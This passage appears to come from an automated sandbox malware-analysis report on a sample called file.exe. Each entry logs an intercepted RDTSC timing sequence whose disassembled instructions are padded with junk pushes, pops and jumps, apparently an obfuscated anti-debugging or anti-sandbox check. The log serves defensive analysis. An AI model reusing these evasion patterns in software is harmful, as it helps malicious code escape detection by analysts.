Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0A4A second address: 53B0A4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 536005F second address: 5360065 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360065 second address: 5360069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 536013B second address: 5360141 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360141 second address: 5360147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360147 second address: 53601C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d pushad 0x0000000e mov ebx, esi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FAAAC4EC6B4h 0x0000001a sub ax, 0B18h 0x0000001f jmp 00007FAAAC4EC6ABh 0x00000024 popfd 0x00000025 mov dx, cx 0x00000028 popad 0x00000029 popad 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov dx, cx 0x00000031 pushfd 0x00000032 jmp 00007FAAAC4EC6AAh 0x00000037 jmp 00007FAAAC4EC6B5h 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53601C2 second address: 536022B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 23F2h 0x00000007 mov dx, 8D3Eh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebx 0x0000000f jmp 00007FAAAC4EBB35h 0x00000014 mov ebx, dword ptr [ebp+10h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jmp 00007FAAAC4EBB33h 0x0000001f pushfd 0x00000020 jmp 00007FAAAC4EBB38h 0x00000025 xor ecx, 4125D498h 0x0000002b jmp 00007FAAAC4EBB2Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 536022B second address: 5360253 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 45BAh 0x00000007 mov eax, edx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007FAAAC4EC6AAh 0x00000012 mov dword ptr [esp], esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FAAAC4EC6AAh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360253 second address: 5360257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360257 second address: 536025D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 536025D second address: 5360266 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 49C3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360266 second address: 536031B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov esi, dword ptr [ebp+08h] 0x0000000a pushad 0x0000000b mov dx, si 0x0000000e mov ecx, 42F020EDh 0x00000013 popad 0x00000014 xchg eax, edi 0x00000015 pushad 0x00000016 call 00007FAAAC4EC6B6h 0x0000001b mov ecx, 21C33591h 0x00000020 pop eax 0x00000021 pushfd 0x00000022 jmp 00007FAAAC4EC6B7h 0x00000027 or ch, 0000007Eh 0x0000002a jmp 00007FAAAC4EC6B9h 0x0000002f popfd 0x00000030 popad 0x00000031 push eax 0x00000032 jmp 00007FAAAC4EC6B1h 0x00000037 xchg eax, edi 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007FAAAC4EC6B3h 0x00000041 sub ecx, 0865783Eh 0x00000047 jmp 00007FAAAC4EC6B9h 0x0000004c popfd 0x0000004d mov ch, 27h 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 536031B second address: 5360321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360321 second address: 5360325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360325 second address: 5360329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360329 second address: 536038F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007FAAAC4EC6B0h 0x0000000f je 00007FAB1E61A978h 0x00000015 jmp 00007FAAAC4EC6B0h 0x0000001a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000021 jmp 00007FAAAC4EC6B0h 0x00000026 je 00007FAB1E61A961h 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FAAAC4EC6B7h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 536038F second address: 53603CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAAAC4EBB38h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53603CB second address: 53603D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53603D1 second address: 53603E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAC4EBB2Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53603E2 second address: 53603F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or edx, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53603F3 second address: 53603F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53603F7 second address: 53603FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53603FD second address: 5360431 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FAAAC4EBB33h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360431 second address: 5360461 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FAB1E61A8EAh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FAAAC4EC6B5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535081B second address: 5350829 instructions: 0x00000000 rdtsc 0x00000002 mov edi, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350829 second address: 535082D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535082D second address: 5350833 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350833 second address: 535085B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FAAAC4EC6AEh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535085B second address: 5350878 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350878 second address: 53508B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 3F943F42h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e pushad 0x0000000f mov esi, 374FB0C1h 0x00000014 pushfd 0x00000015 jmp 00007FAAAC4EC6AEh 0x0000001a sbb al, FFFFFFD8h 0x0000001d jmp 00007FAAAC4EC6ABh 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, ebx 0x00000025 pushad 0x00000026 mov esi, 0A3501ABh 0x0000002b push eax 0x0000002c push edx 0x0000002d mov esi, 1332D8DDh 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53508B9 second address: 53508D5 instructions: 0x00000000 rdtsc 0x00000002 mov edi, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAAAC4EBB32h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53508D5 second address: 53508DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53508DB second address: 5350947 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FAAAC4EBB2Eh 0x00000011 xchg eax, esi 0x00000012 jmp 00007FAAAC4EBB30h 0x00000017 push eax 0x00000018 pushad 0x00000019 movsx ebx, si 0x0000001c mov ebx, eax 0x0000001e popad 0x0000001f xchg eax, esi 0x00000020 jmp 00007FAAAC4EBB34h 0x00000025 mov esi, dword ptr [ebp+08h] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FAAAC4EBB37h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350947 second address: 535095F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAC4EC6B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535095F second address: 5350963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350963 second address: 53509F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 00000000h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FAAAC4EC6AAh 0x00000014 and esi, 3DFBBF18h 0x0000001a jmp 00007FAAAC4EC6ABh 0x0000001f popfd 0x00000020 mov dl, cl 0x00000022 popad 0x00000023 test esi, esi 0x00000025 pushad 0x00000026 call 00007FAAAC4EC6B1h 0x0000002b jmp 00007FAAAC4EC6B0h 0x00000030 pop eax 0x00000031 call 00007FAAAC4EC6ABh 0x00000036 pushfd 0x00000037 jmp 00007FAAAC4EC6B8h 0x0000003c or al, 00000008h 0x0000003f jmp 00007FAAAC4EC6ABh 0x00000044 popfd 0x00000045 pop eax 0x00000046 popad 0x00000047 je 00007FAB1E622049h 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53509F7 second address: 53509FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53509FB second address: 53509FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53509FF second address: 5350A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350A05 second address: 5350A4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 call 00007FAAAC4EC6B2h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f cmp dword ptr [esi+08h], DDEEDDEEh 0x00000016 jmp 00007FAAAC4EC6B1h 0x0000001b mov ecx, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FAAAC4EC6ADh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350A4A second address: 5350AAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAAAC4EBB37h 0x00000009 sbb cx, D6BEh 0x0000000e jmp 00007FAAAC4EBB39h 0x00000013 popfd 0x00000014 push eax 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 je 00007FAB1E621440h 0x0000001f jmp 00007FAAAC4EBB2Ah 0x00000024 test byte ptr [77516968h], 00000002h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FAAAC4EBB2Ah 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350AAE second address: 5350AB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350AB4 second address: 5350ABA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350ABA second address: 5350ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350ABE second address: 5350AE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FAB1E621400h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350AE8 second address: 5350B05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350B05 second address: 5350B57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007FAAAC4EBB2Eh 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FAAAC4EBB2Eh 0x00000019 xor al, 00000038h 0x0000001c jmp 00007FAAAC4EBB2Bh 0x00000021 popfd 0x00000022 mov dx, cx 0x00000025 popad 0x00000026 push eax 0x00000027 pushad 0x00000028 mov esi, edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350B57 second address: 5350BBD instructions: 0x00000000 rdtsc 0x00000002 mov eax, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 jmp 00007FAAAC4EC6B5h 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 call 00007FAAAC4EC6AAh 0x00000015 pop eax 0x00000016 mov cx, bx 0x00000019 popad 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007FAAAC4EC6AAh 0x00000021 or ax, 1D28h 0x00000026 jmp 00007FAAAC4EC6ABh 0x0000002b popfd 0x0000002c pop esi 0x0000002d popad 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FAAAC4EC6B5h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360E36 second address: 5360E3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360E3A second address: 5360E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360E40 second address: 5360E55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 mov si, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov eax, edx 0x00000012 mov dl, 98h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360E55 second address: 5360E8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAAC4EC6B5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360E8A second address: 5360EA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360EA7 second address: 5360EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360EAB second address: 5360EB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360EB1 second address: 5360EB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360EB7 second address: 5360ED6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAAAC4EBB32h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360ED6 second address: 5360EDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360EDA second address: 5360EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360EE0 second address: 5360EF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAC4EC6ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D08AF second address: 53D08BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAC4EBB2Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D08BF second address: 53D08E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FAAAC4EC6B7h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D08E7 second address: 53D08EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D08EB second address: 53D08EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D08EF second address: 53D08F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D08F5 second address: 53D08FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D06BA second address: 53D06C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53701F1 second address: 53701F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53701F5 second address: 53701FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53701FB second address: 5370201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370201 second address: 5370205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370205 second address: 5370209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370209 second address: 537021A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 537021A second address: 537021E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 537021E second address: 5370224 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0B21 second address: 53D0B27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0B27 second address: 53D0B55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FAAAC4EBB2Ch 0x00000008 pop eax 0x00000009 mov bh, 9Ah 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FAAAC4EBB34h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0B55 second address: 53D0B64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0B64 second address: 53D0B7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAC4EBB34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0B7C second address: 53D0B80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0B80 second address: 53D0B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAAAC4EBB2Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0B96 second address: 53D0C4A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FAAAC4EC6B2h 0x00000008 sub eax, 72BB53A8h 0x0000000e jmp 00007FAAAC4EC6ABh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov ecx, 7730AA9Fh 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e mov ch, 4Eh 0x00000020 mov ebx, 35B9C8F0h 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 pushad 0x00000029 mov dx, C608h 0x0000002d pushfd 0x0000002e jmp 00007FAAAC4EC6B1h 0x00000033 sub cx, 0676h 0x00000038 jmp 00007FAAAC4EC6B1h 0x0000003d popfd 0x0000003e popad 0x0000003f push dword ptr [ebp+0Ch] 0x00000042 pushad 0x00000043 movzx esi, bx 0x00000046 mov dx, C0ACh 0x0000004a popad 0x0000004b push dword ptr [ebp+08h] 0x0000004e jmp 00007FAAAC4EC6ABh 0x00000053 call 00007FAAAC4EC6A9h 0x00000058 jmp 00007FAAAC4EC6B6h 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 